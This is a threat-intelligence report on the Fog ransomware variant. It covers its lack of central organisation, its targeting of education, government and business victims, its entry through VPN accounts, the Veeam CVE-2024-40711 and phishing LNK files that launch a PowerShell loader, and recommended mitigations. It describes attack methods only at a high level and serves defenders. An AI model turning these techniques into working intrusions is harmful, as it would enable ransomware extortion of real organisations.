Full Report
Fog ransomware is a sophisticated threat actor known for rapid encryption and lack of centralized organization. This post explores the origins, operations, attacks, and the known unknowns of Fog.
Analysis Summary
# Threat Actor: Fog Ransomware
## Attribution & Identity
Fog is classified as a ransomware variant rather than a single dedicated threat actor group. There is no evidence of a centralized operation, suggesting it can be used by different threat actors independently. Developers and intrusion operators appear separate. It is explicitly stated that Fog does **not** fit the description of a Ransomware-as-a-Service (RaaS) operation, although its modular design could permit future RaaS usage. Despite being a variant, the actors utilizing it share common TTPs, infrastructure, and communication methods (e.g., branded leak site, negotiation portal).
## Activity Summary
Fog ransomware emerged in April 2024, characterized by rapid encryption and double extortion tactics. Initial operations targeted educational institutions via compromised VPN accounts. Activities expanded to include government agencies and various business sectors. As of April 2025, 189 victims have been publicly reported.
## Tactics, Techniques & Procedures
- **Initial Access:** Compromised VPN accounts (often purchased from Initial Access Brokers - IABs), exploitation of unpatched software (specifically Veeam Backup & Replication CVE-2024-40711), and phishing campaigns.
- **Delivery Mechanism (Phishing):** Phishing emails impersonate VPN updates, invoice inquiries, or HR policy changes. Recent phishing uses ZIP files containing a malicious LNK shortcut that executes a PowerShell script ("stage1.ps1") to download the ransomware loader.
- **Extortion:** Employs double extortion tactics.
- **Communication:** Actors communicate during attacks using Command-and-Control (C2) servers and encrypted channels.
- **Ransom Notes:** Notes sometimes mock victims using references to Edward Coristine and the U.S. Department of Government Efficiency (DOGE), although no genuine affiliation with DOGE exists.
- **Modularity:** The ransomware’s modular design allows attackers to precisely control the scope of encryption, encryption pace, and ransom note content.
## Targeting
- **Sectors:** Business services, technology, manufacturing, education, and government (top five sectors as of February 2025).
- **Geography:** Most victims are based in the United States. Threat actors conspicuously avoid targeting Eastern European countries and the People’s Republic of China.
- **Victims:** Educational institutions, government agencies, and businesses.
## Tools & Infrastructure
- **Malware families used:** Fog ransomware variant.
- **Infrastructure (C2, domains, IPs):** An IP address associated with Fog activity was traced back to Moscow in 2024. Actors use attacker-controlled domains to fetch payloads and leverage C2 servers for communication.
- **Specific CVEs:** Actively exploits CVE-2024-40711 (Veeam Backup & Replication).
## Implications
Fog represents a financially motivated threat that has rapidly diversified its targeting sectors. The use of common infrastructure and communication channels across unrelated intrusions suggests a coordinated, though not centrally organized (like RaaS), threat ecosystem surrounding the malware variant. A median initial ransom demand was calculated at \$220,000. The primary vector relies on exploiting external remote access solutions (VPNs) and unpatched software.
## Mitigations
- Implement strong foundational security practices, including layered security measures.
- Enforce Multifactor Authentication (MFA) and Zero Trust Access principles.
- Maintain robust patch management, especially for remote access systems like VPNs, and decommission unused accounts.
- Network segmentation to isolate sensitive data and backup systems, restricting intruder movement.
- Utilize advanced security solutions (e.g., Managed XDR) capable of identifying and stopping pre-encryption activities.
- Implement top-tier backup solutions for data, configurations, and cloud deployments.
- Conduct regular security awareness training focused on recognizing current phishing campaigns (e.g., those mimicking VPN requests or HR documents).